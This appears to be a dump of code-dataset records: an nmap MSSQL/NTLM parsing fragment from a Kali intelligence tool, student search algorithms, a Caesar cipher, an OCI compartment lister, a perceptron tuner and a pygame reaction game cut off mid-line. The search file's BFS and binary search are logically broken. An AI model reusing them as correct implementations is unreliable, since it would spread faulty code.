host=self._service.host,\n source=self._source,\n report_item=self._report_item)\n if service:\n service.nmap_service_name = MsSqlExtraInfoExtraction.MSSQL_SERVICE_NAME[0]\n elif script_count > 1:\n raise NotImplementedError(\"expected only one '/script/[@id='{}']' entry.\".format(\n MsSqlExtraInfoExtraction.MSSQL_TCP_PORTS))\n\n def _extract_ntlm_info(self, port_tag) -> None:\n \"\"\"This method extracts NTLM information\"\"\"\n super()._extract_ntlm_info(port_tag, tag_id=MsSqlExtraInfoExtraction.MSSQL_NTLM_INFO)\n\n def extract(self, **kwargs):\n \"\"\"This method extracts disclosed information from SMB services.\"\"\"\n self._extract_sql_info(kwargs[\"host_tag\"])\n self._extract_ntlm_info(kwargs[\"port_tag\"])","repo_name":"chopicalqui/KaliIntelligenceSuite","sub_path":"kis/collectors/os/modules/mssql/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"35"} +{"seq_id":"3132984586","text":"import sys\nsys.stdin.readline()\nsys.setrecursionlimit(10**6)\n\nV, E = map(int, input().split())\nG = [[] for v in range(V+1)]\nvisited = [False] * (V+1)\n\nfor _ in range(E):\n s, e = map(int, input().split())\n G[s].append(e)\n G[e].append(s) # bidirectional\n\ndef DFS(start):\n visited[start] = True\n for vertex in G[start]:\n if not visited[vertex]:\n DFS(vertex)\n\ndef BFS(start):\n queue = []\n queue.append(start)\n now = queue.pop()\n\n while queue:\n visited[now] = True\n\n for next in G[now]:\n if not visited[next]:\n queue.append(next)\n\nnum = [5, 6, 3, 4, 1, 2]\n\ndef Bsearch(num : list, key):\n num.sort()\n front = 0\n rear = len(num) - 1\n\n while front <= rear:\n mid = (front + rear) // 2\n if num[mid] == key:\n return mid\n \n elif num[mid] > key:\n front = mid + 1\n\n else:\n rear = mid - 1\n \n return -1\n\n\n\n\n\n\n\n \n\n","repo_name":"MTsauRus/TIL","sub_path":"algorithms/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74679635619","text":"# Name: Hajer Qara\n# Date: 5/29/2022\n# File Name: CaesarCiphe.py\n\n# Caesar Cipher was an past assignment that enabled a user \n# to input a string of text to encrypt or decrypt\n# Note: Users are advised to use uppercase 'E' and uppercase 'D' when making a selection \n\ndef encryptstr(message):\n #declare variables\n newstring=str()\n ascii_letter_value=int()\n one_letter=str()\n new_ascii_value=int()\n #loop to assign new ASCII value\n for index in range(0,len(message)):\n one_letter= message[index]\n ascii_letter_value=ord(one_letter)\n #checking if the letter is Z or z\n if ascii_letter_value==122:\n new_ascii_value=97\n elif ascii_letter_value==90:\n new_ascii_value=65\n #assigning a new ascii value if not Z or z\n else:\n new_ascii_value= ascii_letter_value + 1\n #creating the new string\n newstring= newstring + chr(new_ascii_value)\n print(newstring)\n\n return newstring\n\ndef decryptstring(message):\n newstring=str()\n ascii_letter_value=int()\n one_letter=str()\n new_ascii_value=int()\n #loop to assign new ASCII value\n for index in range(0,len(message)):\n one_letter= message[index]\n ascii_letter_value=ord(one_letter)\n #checking if the letter is Z or z\n if ascii_letter_value==97:\n new_ascii_value=122\n elif ascii_letter_value==65:\n new_ascii_value=90\n #assigning a new ascii value if not Z or z\n else:\n new_ascii_value= ascii_letter_value - 1\n #creating the new string\n newstring= newstring + chr(new_ascii_value)\n print(newstring)\n\n return newstring\n\n\ndef main():\n message=str()\n userchoice=str()\n message=input(\"Enter text: \")\n userchoice=input(\"(E)ncrypt or (D)ecrypt? \")\n\n if userchoice == \"E\":\n encryptstr(message)\n else:\n decryptstring(message)\n \n\nmain()\n \n","repo_name":"HajerQara/CaesarCipher","sub_path":"CaesarCipher.py","file_name":"CaesarCipher.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14947617953","text":"#!/usr/bin/env python3\n\n# --------------------------------------------------------------------------------------------------------------\n# This script lists all the compartments and sub-compartments names and IDs in an OCI tenant using OCI Python SDK\n# The output is formatted with colors and indents to easily identify parents of sub-compartments\n# Note: OCI tenant given by an OCI CLI PROFILE\n# It is much faster than the corresponding Bash script on tenant with many compartments\n#\n# Author : Christophe Pauliat\n# Platforms : MacOS / Linux\n# prerequisites : - Python 3 with OCI Python SDK installed\n# - OCI config file configured with profiles\n# Versions\n# 2019-10-18: Initial Version\n# 2020-04-24: minor code enhancements\n# --------------------------------------------------------------------------------------------------------------\n\n# -- import\nimport oci\nimport sys\n\n# ---------- Colors for output\nCOLOR_YELLOW=\"\\033[93m\"\nCOLOR_RED=\"\\033[91m\"\nCOLOR_GREEN=\"\\033[32m\"\nCOLOR_NORMAL=\"\\033[39m\"\nCOLOR_CYAN=\"\\033[96m\"\nCOLOR_BLUE=\"\\033[94m\"\nCOLOR_GREY=\"\\033[90m\"\n\n# ---------- variables\nconfigfile = \"~/.oci/config\" # Define config file to be used.\nflag=[0,0,0,0,0,0,0,0,0,0]\n\n# ---------- functions\ndef usage():\n print (\"Usage: {} [-d] OCI_PROFILE\".format(sys.argv[0]))\n print (\"\")\n print (\" If -d is provided, deleted compartments are also listed.\")\n print (\" If not, only active compartments are listed.\")\n print \n print (\"note: OCI_PROFILE must exist in {} file (see example below)\".format(configfile))\n print (\"\")\n print (\"[EMEAOSCf]\")\n print (\"tenancy = ocid1.tenancy.oc1..aaaaaaaaw7e6nkszrry6d5hxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\")\n print (\"user = ocid1.user.oc1..aaaaaaaayblfepjieoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\")\n print (\"fingerprint = 19:1d:7b:3a:17:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx\")\n print (\"key_file = /Users/cpauliat/.oci/api_key.pem\")\n print (\"region = eu-frankfurt-1\")\n exit (1)\n\ndef get_cpt_name_and_state_from_id(cpt_id):\n for c in compartments:\n if (c.id == cpt_id):\n return c.name, c.lifecycle_state\n return\n\ndef list_compartments(parent_id, level):\n # level = 0 for root, 1 for 1st level compartments, ...\n Debug=False\n\n if (Debug):\n print (\"NEW ITER: DEBUG: level=%d parent_id=%s \" % (level, parent_id), end='')\n print (\"flag=\",flag)\n \n i=1\n while i < level:\n if flag[i] == 0:\n print (COLOR_CYAN+\"│ \"+COLOR_NORMAL,end='')\n else:\n print (\" \",end='')\n i += 1 \n\n if level > 0:\n cptname, state = get_cpt_name_and_state_from_id (parent_id) \n \n if flag[level] == 0:\n print (COLOR_CYAN+\"├───── \"+COLOR_NORMAL,end='')\n else:\n print (COLOR_CYAN+\"└───── \"+COLOR_NORMAL,end='')\n else:\n cptname='root'\n state=\"ACTIVE\"\n \n if state == \"ACTIVE\":\n print (COLOR_GREEN+cptname+COLOR_NORMAL+\" \"+parent_id+COLOR_YELLOW+\" ACTIVE\"+COLOR_NORMAL)\n else:\n print (COLOR_BLUE+cptname+COLOR_GREY+\" \"+parent_id+COLOR_RED+\" DELETED\"+COLOR_NORMAL)\n\n # get the list of ids of the direct sub-compartments\n sub_compartments_ids_list=[]\n for c in compartments:\n if c.compartment_id == parent_id:\n if LIST_DELETED or c.lifecycle_state != \"DELETED\":\n sub_compartments_ids_list.append(c.id)\n \n # then for each of those cpt ids, display the sub-compartments details\n if (Debug):\n print (\"DEBUG: len=%d\" % len(sub_compartments_ids_list))\n i=1\n for cid in sub_compartments_ids_list: \n # if processing the last sub dir\n if (Debug):\n print (\"DEBUG: test child %s\" % cid) \n if i == len(sub_compartments_ids_list):\n flag[level+1]=1\n else:\n flag[level+1]=0\n if (Debug):\n print (\"DEBUG: flag\", flag)\n list_compartments(cid, level+1)\n i += 1\n\n# ---------- main\nLIST_DELETED=False\n\n# -- parsing arguments\nif (len(sys.argv) != 2) and (len(sys.argv) != 3):\n usage()\n\nif (len(sys.argv) == 2):\n profile = sys.argv[1] \nelif (len(sys.argv) == 3):\n profile = sys.argv[2]\n if (sys.argv[1] == \"-d\"):\n LIST_DELETED=True\n else:\n usage()\n \n# -- get OCI Config\ntry:\n config = oci.config.from_file(configfile,profile)\n\nexcept:\n print (\"ERROR: profile '{}' not found in config file {} !\".format(profile,configfile))\n exit (2)\n\nIdentityClient = oci.identity.IdentityClient(config)\nuser = IdentityClient.get_user(config[\"user\"]).data\nRootCompartmentID = user.compartment_id\n\n# -- get list of compartments with all sub-compartments\nresponse = oci.pagination.list_call_get_all_results(IdentityClient.list_compartments,RootCompartmentID,compartment_id_in_subtree=True)\ncompartments = response.data\n\nlist_compartments(RootCompartmentID,0)\n\nexit (0)\n","repo_name":"hackom1234/oci","sub_path":"my-oci-scripts/OCI_compartments_list_formatted.py","file_name":"OCI_compartments_list_formatted.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74363249061","text":"from functools import partial\n\nfrom utils import *\nfrom MultilabelKernelPerceptron import MultilabelKernelPerceptron\nfrom MNIST import label_set\n\n\ndef tune(xs, ys, reduction, approach):\n # Keeping the same split as MNIST\n validation_size = int(reduction * 1 / 7)\n\n x_train, y_train = xs[:-validation_size], ys[:-validation_size]\n x_val, y_val = xs[validation_size:], ys[validation_size:]\n\n results = []\n\n for epochs in EPOCHS:\n for degree in DEGREES:\n perceptron = MultilabelKernelPerceptron(\n partial(polynomial, degree=degree),\n label_set,\n epochs,\n x_train,\n y_train,\n approach,\n DEVICE\n )\n\n perceptron.fit()\n validation_error = perceptron.error(x_val, y_val)\n results.append((validation_error, epochs, degree))\n\n return min(results, key=lambda x: int(x[0] * 1000))[1:]\n","repo_name":"lfoscari/mnist-perceptron","sub_path":"HyperparameterTuning.py","file_name":"HyperparameterTuning.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29370709312","text":"import pygame\nimport random\nfrom collections import deque\nimport reactor_colors as color\n\n\ndef run_reactor(surface, surface_width, surface_height, margin, margin_color,\n scaler, clock, fps,\n door_speed, score_goal, time_limit):\n\n # variables\n pygame.display.set_caption(\"REACTOR\")\n door_thinness = 10\n margin_return_nominal_state = 0\n margin_return_nominal_state_duration = 25\n disc_color_rising = True\n disc_color = 200\n landing = False\n disc_distance = 500 # starting size used for placing new disc after scoring\n lives = 10\n score = 0\n collisions = 0\n collision_result_front, collision_result_back = False, False\n particle, all_particles, modded_particles = [], [], []\n current_disc_color = color.blue\n disc_explosion_color = (0, 0, 0)\n timer_marker = pygame.time.get_ticks() # starter tick\n current_react_data = {}\n react_fade_speed = .25\n react_movement_speed = .25\n shadow_delay = 1\n shadow_coord_1 = deque([], maxlen=shadow_delay)\n shadow_coord_2 = deque([], maxlen=shadow_delay * 2)\n shadow_coord_3 = deque([], maxlen=shadow_delay * 3)\n shadow_coord_4 = deque([], maxlen=shadow_delay * 4)\n shadow_coord_5 = deque([], maxlen=shadow_delay * 5)\n shadow_coord_6 = deque([], maxlen=shadow_delay * 6)\n shadow_coord_7 = deque([], maxlen=shadow_delay * 7)\n shadow_coord_8 = deque([], maxlen=shadow_delay * 8)\n shadow_coord_9 = deque([], maxlen=shadow_delay * 9)\n shadow_coord_10 = deque([], maxlen=shadow_delay * 10)\n all_shadows = [shadow_coord_10,\n shadow_coord_9,\n shadow_coord_8,\n shadow_coord_7,\n shadow_coord_6,\n shadow_coord_5,\n shadow_coord_4,\n shadow_coord_3,\n shadow_coord_2,\n shadow_coord_1]\n game_over = False\n\n class Doors:\n def __init__(self):\n self.width_TB = (surface_width // 2) - 1\n self.height_TB = surface_height // door_thinness\n self.width_LR = surface_height // door_thinness\n self.height_LR = (surface_height // 2) - 1\n self.true_door_speed = door_speed\n self.door_speed = int(self.true_door_speed * scaler)\n self.switcher = 0\n self.openings = 0\n self.rest_period = 25\n self.current_rest_period = -100\n self.random_range = random.randint(10, 100)\n self.locked = False\n self.start_mark_open = 0\n self.start_timer = True\n self.last_open = 0\n\n # top doors\n self.x_T_L = 0\n self.y_T_L = 0\n self.x_T_R = (surface_width // 2) + 2\n self.y_T_R = 0\n self.rect_T_L = pygame.Rect(self.x_T_L, self.y_T_L, self.width_TB, self.height_TB)\n self.rect_T_R = pygame.Rect(self.x_T_R, self.y_T_R, self.width_TB, self.height_TB)\n self.direction_T = 0\n self.rest_period_T = 0\n self.rest_T = True\n\n # bottom doors\n self.x_B_L = 0\n self.y_B_L = surface_height - (surface_height // door_thinness)\n self.x_B_R = (surface_width // 2) + 2\n self.y_B_R = surface_height - (surface_height // door_thinness)\n self.rect_B_L = pygame.Rect(self.x_B_L, self.y_B_L, self.width_TB, self.height_TB)\n self.rect_B_R = pygame.Rect(self.x_B_R, self.y_B_R, self.width_TB, self.height_TB)\n self.direction_B = 0\n self.rest_period_B = 0\n self.rest_B = True\n\n # left doors\n self.x_L_T = 0\n self.y_L_T = 0\n self.x_L_B = 0\n self.y_L_B = (surface_height // 2) + 2\n self.rect_L_T = pygame.Rect(self.x_L_T, self.y_L_T, self.width_LR, self.height_LR)\n self.rect_L_B = pygame.Rect(self.x_L_B, self.y_L_B, self.width_LR, self.height_LR)\n self.direction_L = 0\n self.rest_period_L = 0\n self.rest_L = True\n\n # right doors\n self.x_R_T = surface_width - self.width_LR\n self.y_R_T = 0\n self.x_R_B = surface_width - self.width_LR\n self.y_R_B = (surface_height // 2) + 2\n self.rect_R_T = pygame.Rect(self.x_R_T, self.y_R_T, self.width_LR, self.height_LR)\n self.rect_R_B = pygame.Rect(self.x_R_B, self.y_R_B, self.width_LR, self.height_LR)\n self.direction_R = 0\n self.rest_period_R = 0\n self.rest_R = True\n\n def slide_T(self):\n\n if self.switcher == 0:\n if self.rest_T:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_T = False\n\n if not self.rest_T:\n result_t = random.randint(1, random.randint(10, 500))\n if result_t == 1:\n self.rest_R, self.rest_L, self.rest_B = True, True, True\n self.switcher = 1\n self.direction_T = 1\n\n elif self.switcher == 1:\n\n if self.rect_T_L.right > 0 and self.direction_T == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_T_L.x -= self.door_speed\n self.rect_T_R.x += self.door_speed\n\n elif self.rect_T_L.right <= 0:\n self.direction_T = -1\n\n if self.direction_T == -1:\n self.rect_T_L.x += self.door_speed\n self.rect_T_R.x -= self.door_speed\n\n if self.rect_T_L.left == 0:\n self.direction_T = 0\n self.rest_T = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_T_L.right, self.rect_T_L.topright[-1] - margin, self.rect_T_L.bottomright[-1]\n\n def slide_B(self):\n\n if self.switcher == 0:\n if self.rest_B:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_B = False\n\n if not self.rest_B:\n result_b = random.randint(1, random.randint(10, 500))\n if result_b == 1:\n self.rest_R, self.rest_L, self.rest_T = True, True, True\n self.switcher = 2\n self.direction_B = 1\n\n elif self.switcher == 2:\n\n if self.rect_B_L.right > 0 and self.direction_B == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_B_L.x -= self.door_speed\n self.rect_B_R.x += self.door_speed\n\n elif self.rect_B_L.right <= 0:\n self.direction_B = -1\n\n if self.direction_B == -1:\n self.rect_B_L.x += self.door_speed\n self.rect_B_R.x -= self.door_speed\n\n if self.rect_B_L.left == 0:\n self.direction_B = 0\n self.rest_B = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_B_L.right, self.rect_B_L.bottomright[-1] - margin, self.rect_B_L.topright[-1]\n\n def slide_L(self):\n\n if self.switcher == 0:\n if self.rest_L:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_L = False\n\n if not self.rest_L:\n result_l = random.randint(1, random.randint(10, 500))\n if result_l == 1:\n self.rest_R, self.rest_B, self.rest_T = True, True, True\n self.switcher = 3\n self.direction_L = 1\n\n elif self.switcher == 3:\n\n if self.rect_L_T.bottom > 0 and self.direction_L == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_L_T.y -= self.door_speed\n self.rect_L_B.y += self.door_speed\n\n elif self.rect_L_T.bottom <= 0:\n self.direction_L = -1\n\n if self.direction_L == -1:\n self.rect_L_T.y += self.door_speed\n self.rect_L_B.y -= self.door_speed\n\n if self.rect_L_T.top == 0:\n self.direction_L = 0\n self.rest_L = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_L_T.bottomleft[0] + margin, self.rect_L_T.bottom, self.rect_L_T.bottomright[0]\n\n def slide_R(self):\n\n if self.switcher == 0:\n if self.rest_R:\n self.current_rest_period += 1\n\n if self.current_rest_period > self.rest_period:\n self.current_rest_period = 0\n self.rest_R = False\n\n if not self.rest_R:\n result_r = random.randint(1, random.randint(10, 500))\n if result_r == 1:\n self.rest_L, self.rest_B, self.rest_T = True, True, True\n self.switcher = 4\n self.direction_R = 1\n\n elif self.switcher == 4:\n\n if self.rect_R_T.bottom > 0 and self.direction_R == 1 and not self.locked:\n\n if self.start_timer:\n self.start_mark_open = pygame.time.get_ticks()\n self.start_timer = False\n self.last_open = self.switcher\n\n self.rect_R_T.y -= self.door_speed\n self.rect_R_B.y += self.door_speed\n\n elif self.rect_R_T.bottom <= 0:\n self.direction_R = -1\n\n if self.direction_R == -1:\n self.rect_R_T.y += self.door_speed\n self.rect_R_B.y -= self.door_speed\n\n if self.rect_R_T.top == 0:\n self.direction_R = 0\n self.rest_R = True\n self.current_rest_period = 0\n self.openings += 1\n self.switcher = 0\n self.start_timer = True\n\n return self.rect_R_T.bottomright[0] - margin, self.rect_R_T.bottom, self.rect_R_T.bottomleft[0]\n\n def draw_doors(self):\n all_doors = [self.rect_T_L, self.rect_T_R, self.rect_B_L, self.rect_B_R,\n self.rect_L_T, self.rect_L_B, self.rect_R_T, self.rect_R_B]\n return [pygame.draw.rect(surface, color.doors_color, door) for door in all_doors]\n\n def get_openings(self):\n return self.openings\n\n class Disc:\n def __init__(self):\n self.true_disc_radius_size = 100\n self.disc_radius_size = self.true_disc_radius_size * scaler\n self.x = (surface_width // 2) - self.disc_radius_size\n self.y = (surface_height // 2) - self.disc_radius_size\n self.disc = pygame.Rect((self.x, self.y), (self.disc_radius_size * 2, self.disc_radius_size * 2))\n self.true_disc_speed = 50\n self.disc_speed = int(self.true_disc_speed * scaler)\n self.switch = 0\n self.rest = 24\n self.score = 0\n self.pulse_speed = 10\n self.start_mark_close = 0\n self.start_timer = True\n\n def launch(self):\n\n success_shot = False\n last_direction = 0\n\n if self.rest:\n self.rest -= 1\n\n else:\n\n pressed_key = pygame.key.get_pressed() # creates tuple of all keys (0) and detects key pressed (1)\n\n if self.switch == 0:\n if pressed_key[pygame.K_UP]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 1\n\n elif pressed_key[pygame.K_DOWN]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 2\n\n elif pressed_key[pygame.K_LEFT]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 3\n\n elif pressed_key[pygame.K_RIGHT]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 4\n\n if self.switch == 1:\n self.disc.y -= self.disc_speed\n elif self.switch == 2:\n self.disc.y += self.disc_speed\n elif self.switch == 3:\n self.disc.x -= self.disc_speed\n elif self.switch == 4:\n self.disc.x += self.disc_speed\n\n if any([self.disc.top > surface_height,\n self.disc.bottom < 0,\n self.disc.left > surface_width,\n self.disc.right < 0]):\n success_shot = True\n self.score += 1\n # self.disc.x, self.disc.y = self.x, self.y\n last_direction = self.switch\n self.switch = 0\n self.rest = 24\n self.start_timer = True\n\n return success_shot, max(self.switch, last_direction), self.disc.center\n\n def collision(self, bx, by, dx, dy):\n distance = (((dx - bx) ** 2) + ((dy - by) ** 2)) ** .5\n\n if distance <= self.disc_radius_size:\n return True, (dx, dy)\n else:\n return False, (dx, dy)\n\n def ball_pulse(self, switch_state, current_color):\n if not lives:\n return False, 0\n\n if current_color >= 245:\n switch_state = False\n elif current_color <= 100:\n switch_state = True\n\n if lives == 10:\n self.pulse_speed = 1\n else:\n self.pulse_speed = int(25 // lives)\n if current_color + self.pulse_speed > 255:\n current_color = 255 - self.pulse_speed\n\n if not switch_state:\n return switch_state, current_color - self.pulse_speed\n elif switch_state:\n return switch_state, current_color + self.pulse_speed\n\n def draw_disc(self, current_color):\n\n blue_shift = current_color\n red_shift = 255 + (current_color * -1) + self.pulse_speed\n\n if red_shift > 200:\n red_shift = 200\n if blue_shift > 255:\n blue_shift = 255\n\n pygame.draw.circle(\n surface,\n (red_shift, 0, blue_shift),\n (self.disc.x + self.disc_radius_size, self.disc.y + self.disc_radius_size),\n self.disc_radius_size,\n int(35 * scaler))\n\n return red_shift, 0, blue_shift\n\n @staticmethod\n def get_ball_color(current):\n return current\n\n def shadow(self, shadow_color):\n\n diff_r = shadow_color[0] - color.background[0]\n diff_g = shadow_color[1] - color.background[1]\n diff_b = shadow_color[2] - color.background[2]\n divisor = len(all_shadows)\n incrementor = [abs(diff_r / divisor), abs(diff_g / divisor), abs(diff_b / divisor)]\n\n r, g, b = shadow_color[0], shadow_color[1], shadow_color[2]\n all_colors = []\n for _ in range(len(all_shadows)):\n if diff_r < 0:\n r += (incrementor[0])\n else:\n r -= (incrementor[0])\n\n if diff_g < 0:\n g += (incrementor[1])\n else:\n g -= (incrementor[1])\n\n if diff_b < 0:\n b += (incrementor[2])\n else:\n b -= (incrementor[2])\n\n output_color = (int(r), int(g), int(b))\n all_colors.append(output_color)\n\n if not landing:\n for idx, shadow in enumerate(all_shadows):\n shadow.append((self.disc.x, self.disc.y))\n pygame.draw.circle(\n surface,\n all_colors[(len(all_shadows) - 1) - idx],\n (shadow[0][0] + self.disc_radius_size, shadow[0][-1] + self.disc_radius_size),\n self.disc_radius_size,\n int((idx + 1) ** 1.3))\n\n def disc_landing(self, distance):\n\n # for idx, shadow in enumerate(all_shadows):\n # shadow.append((self.disc.x, self.disc.y))\n for idx in range(len(all_shadows)-1, -1, -1):\n all_shadows[idx].append((self.disc.x, self.disc.y))\n\n pygame.draw.circle(surface, current_disc_color,\n (self.disc.x + self.disc_radius_size, self.disc.y + self.disc_radius_size),\n self.disc_radius_size + distance,\n int((35 * scaler) + distance // 4))\n\n\n def draw_margin(m_color, rehab):\n # red = (240, 17, 59)\n # blue = (59, 17, 240)\n # purple = (82, 0, 106)\n r, g, b = m_color[0], m_color[1], m_color[2]\n if rehab < margin_return_nominal_state_duration:\n\n fail_nominal_shift = \\\n (abs(color.fail_color[0] - color.margin_color[0]) / margin_return_nominal_state_duration,\n abs(color.fail_color[1] - color.margin_color[1]) / margin_return_nominal_state_duration,\n abs(color.fail_color[2] - color.margin_color[2]) / margin_return_nominal_state_duration)\n success_nominal_shift = \\\n (abs(color.success_color[0] - color.margin_color[0]) / margin_return_nominal_state_duration,\n abs(color.success_color[1] - color.margin_color[1]) / margin_return_nominal_state_duration,\n abs(color.success_color[2] - color.margin_color[2]) / margin_return_nominal_state_duration)\n\n shift = (0, 0, 0)\n if m_color == color.fail_color:\n shift = fail_nominal_shift\n elif m_color == color.success_color:\n shift = success_nominal_shift\n\n if m_color[0] > color.margin_color[0]:\n r = m_color[0] - shift[0] * rehab\n else:\n r = m_color[0] + shift[0] * rehab\n\n if m_color[1] > color.margin_color[1]:\n g = m_color[1] - shift[1] * rehab\n else:\n g = m_color[1] + shift[1] * rehab\n\n if m_color[2] > color.margin_color[2]:\n b = m_color[2] - shift[2] * rehab\n else:\n b = m_color[2] + shift[2] * rehab\n\n m_color = int(r), int(g), int(b)\n\n return pygame.draw.rect(surface, m_color, (0, 0, surface_width, surface_height), margin)\n\n # text rendered using blit\n def stats(total_points, lives_left, time_left):\n font_style = \"darkforest.ttf\"\n lives_style = \"SF Square Head Bold.ttf\"\n font = pygame.font.Font(f\"{font_style}\", int(20 * scaler))\n lives_font = pygame.font.Font(f\"{lives_style}\", int(75 * scaler))\n\n text_color = color.doors_color\n timer_color = color.doors_color\n lives_color = color.doors_color\n if time_left <= 10:\n timer_color = color.fail_color\n\n if lives_left <= 3:\n lives_color = color.fail_color\n\n shot_accuracy = total_points[0]\n total_openings = total_points[-1]\n\n text_surface = font.render(f\"shots made/total: {shot_accuracy}\", True, text_color)\n text_surface1 = lives_font.render(str(lives_left), True, lives_color)\n text_surface2 = font.render(str(time_left), True, timer_color)\n text_surface3 = font.render(f\"tries/openings: {total_openings}\", True, text_color)\n\n text_rect = text_surface.get_rect()\n text_rect1 = text_surface1.get_rect()\n text_rect2 = text_surface2.get_rect()\n text_rect3 = text_surface3.get_rect()\n\n text_rect.centerx, text_rect.centery = surface_width // 2, surface_height // 2 + (130 * scaler)\n text_rect1.centerx, text_rect1.centery = surface_width // 2, surface_height // 2\n text_rect2.centerx, text_rect2.centery = surface_width // 2, surface_height // 2 + (40 * scaler)\n text_rect3.centerx, text_rect3.centery = surface_width // 2, surface_height // 2 - (130 * scaler)\n\n surface.blit(text_surface, text_rect)\n surface.blit(text_surface1, text_rect1)\n\n if time_remaining >= 0:\n surface.blit(text_surface2, text_rect2)\n\n surface.blit(text_surface3, text_rect3)\n\n def accuracy(pass_throughs, fails, door_slides):\n total_tries = pass_throughs + fails\n\n if not total_tries:\n percentage_1 = 0.0\n else:\n percentage_1 = round((pass_throughs / total_tries) * 100, 1)\n\n if not door_slides:\n percentage_2 = 0.0\n else:\n percentage_2 = round((total_tries / door_slides) * 100, 1)\n # print(pass_throughs, fails, total_tries, door_slides)\n return f\"{pass_throughs}/{total_tries} {percentage_1}\", f\"{total_tries}/{door_slides} {percentage_2}\"\n\n def build_reaction_data(total, success_fail, reaction_time, disc_direction, door):\n\n total.setdefault(\"door_speed\", doors.true_door_speed)\n total.setdefault(\"disc_speed\", disc.true_disc_speed)\n total.setdefault(\"disc_size\", disc.true_disc_radius_size)\n total.setdefault(\"success\", [])\n total.setdefault(\"fail\", [])\n total.setdefault(\"last_shot_made\", success_fail)\n\n y_axis_movement = 0\n starting_color_success = color.success_color\n starting_color_fail = color.fail_color\n current_timer = round(time_remaining_decimal, 2) # pulled from timer function\n\n if success_fail:\n total[\"success\"].append([disc_direction,\n door,\n reaction_time,\n y_axis_movement,\n starting_color_success,\n round(time_limit - current_timer, 2)])\n total[\"last_shot_made\"] = True\n else:\n total[\"fail\"].append([disc_direction,\n door, reaction_time,\n y_axis_movement,\n starting_color_fail,\n round(time_limit - current_timer, 2)])\n total[\"last_shot_made\"] = False\n\n return total\n\n def reaction_text(reaction_data):\n\n door_speed_data = reaction_data['door_speed']\n disc_speed_data = reaction_data['disc_speed']\n disc_size_data = reaction_data['disc_size']\n success_data = reaction_data['success']\n fail_data = reaction_data['fail']\n shot_made = reaction_data['last_shot_made']\n\n if shot_made:\n y_adjustment = int(success_data[-1][-3])\n current_color = list(success_data[-1][-2])\n\n diff = [abs(color.background[0] - color.success_color[0]),\n abs(color.background[1] - color.success_color[1]),\n abs(color.background[2] - color.success_color[2])]\n\n smallest = min(diff)\n\n increments = ((diff[0] / smallest),\n (diff[1] / smallest),\n (diff[2] / smallest))\n else:\n y_adjustment = int(fail_data[-1][-3])\n current_color = list(fail_data[-1][-2])\n\n diff = [abs(color.background[0] - color.fail_color[0]),\n abs(color.background[1] - color.fail_color[1]),\n abs(color.background[2] - color.fail_color[2])]\n\n smallest = min(diff)\n\n increments = ((diff[0] / smallest),\n (diff[1] / smallest),\n (diff[2] / smallest))\n\n if color.background[0] - current_color[0] < 0:\n current_color[0] -= increments[0] * react_fade_speed\n else:\n current_color[0] += increments[0] * react_fade_speed\n if color.background[1] - current_color[1] < 0:\n current_color[1] -= increments[1] * react_fade_speed\n else:\n current_color[1] += increments[1] * react_fade_speed\n if color.background[2] - current_color[2] < 0:\n current_color[2] -= increments[2] * react_fade_speed\n else:\n current_color[2] += increments[2] * react_fade_speed\n\n current_color = (int(current_color[0]), int(current_color[1]), int(current_color[2]))\n\n font_style = \"darkforest.ttf\"\n if success_data:\n success_font_size = 60 - (success_data[-1][2] // 10)\n if success_font_size < 20:\n success_font_size = 20\n else:\n success_font_size = 20\n\n success_font = pygame.font.Font(f\"{font_style}\", int(success_font_size * scaler))\n fail_font = pygame.font.Font(f\"{font_style}\", int(20 * scaler))\n\n directions = [(surface_width // 2, surface_height // 4 + y_adjustment),\n (surface_width // 2, surface_height - (surface_height // 6) + y_adjustment),\n (surface_width // 4, surface_height // 2 + y_adjustment),\n (surface_width - (surface_width // 4), surface_height // 2 + y_adjustment)]\n\n if not shot_made:\n text_surface = fail_font.render(f\"{fail_data[-1][2]}ms\", True, current_color)\n text_rect = text_surface.get_rect()\n\n text_rect.center = directions[fail_data[-1][1] - 1]\n if current_color != color.background:\n surface.blit(text_surface, text_rect)\n reaction_data[\"fail\"][-1][-2] 